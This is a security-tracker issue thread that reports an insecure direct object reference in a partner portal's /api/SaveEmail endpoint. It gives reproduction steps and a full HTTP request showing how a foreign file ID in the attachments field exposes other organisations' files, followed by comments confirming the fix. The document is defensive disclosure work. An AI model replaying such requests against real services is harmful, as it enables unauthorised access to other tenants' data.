### ISSUE TITLE
SEC-4923 - IDOR in POST request to /api/SaveEmail

### ISSUE THREAD

**Issue by prashantjadhav92** [MindMatrix/SecurityTracker#111]
IDOR in POST request to /api/SaveEmail allows to access any file from other organizations via attachments.

Steps to Reproduce:
In the following request in attachments in documents, videos or images add value in the format "<file_id>":"anything" and specify correct emailid from your organization and contact to which email address you have access to. Send the request.

POST /api/SaveEmail HTTP/2
Host: partners.acronis.com
Cookie: [COOKIES]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Csrf-Token: [CSRF_TOKEN]
X-Requested-With: XMLHttpRequest
Content-Length: 380
Origin: https://partners.acronis.com
Referer: https://partners.acronis.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers {"emailid":26456,"name":"eee","subject":"eee","sendon":"2022-08-01T17:40:05.052Z","contacts":{"479341":"laz0rde+company2@bugcrowdninja.com"},"lists":{},"groups":{},"attachments":{"images":{},"documents":{"108411":"ga2 br2 abyusif (0 bytes)"},"videos":{}},"onbehalf":null,"isgmail":false,"replyto":106257,"resendon":null,"templateIds":[],"fileIds":[108274],"isPlaybookAsset":false}

Wait for the email and see file from another organization in attachment

Fix: it must not be possible to access data of other organizations

**Comment by PuneetRevclerx** [comment]
@shaileshtayde sir, I have checked above security issue and user is able to send an email with attachment of file from other organization.
User: puneet security
Company: Automation Testers

**Comment by MeghanaThakekar** [comment]
@shaileshtayde @Vish-Patil - same as https://github.com/MindMatrix/SecurityTracker/issues/142

**Comment by shivmishra** [comment]
this should be already fixed on live from this PR https://github.com/MindMatrix/AMP/pull/51920

**Comment by PuneetRevclerx** [comment]
@prashantjadhav92 sir, I have checked above security issue on Acronis Production and it's working as expected now.

**Comment by prashantjadhav92** [comment]
I have asked the client to verify.

**Comment by prashantjadhav92** [comment]
Verified by the client.
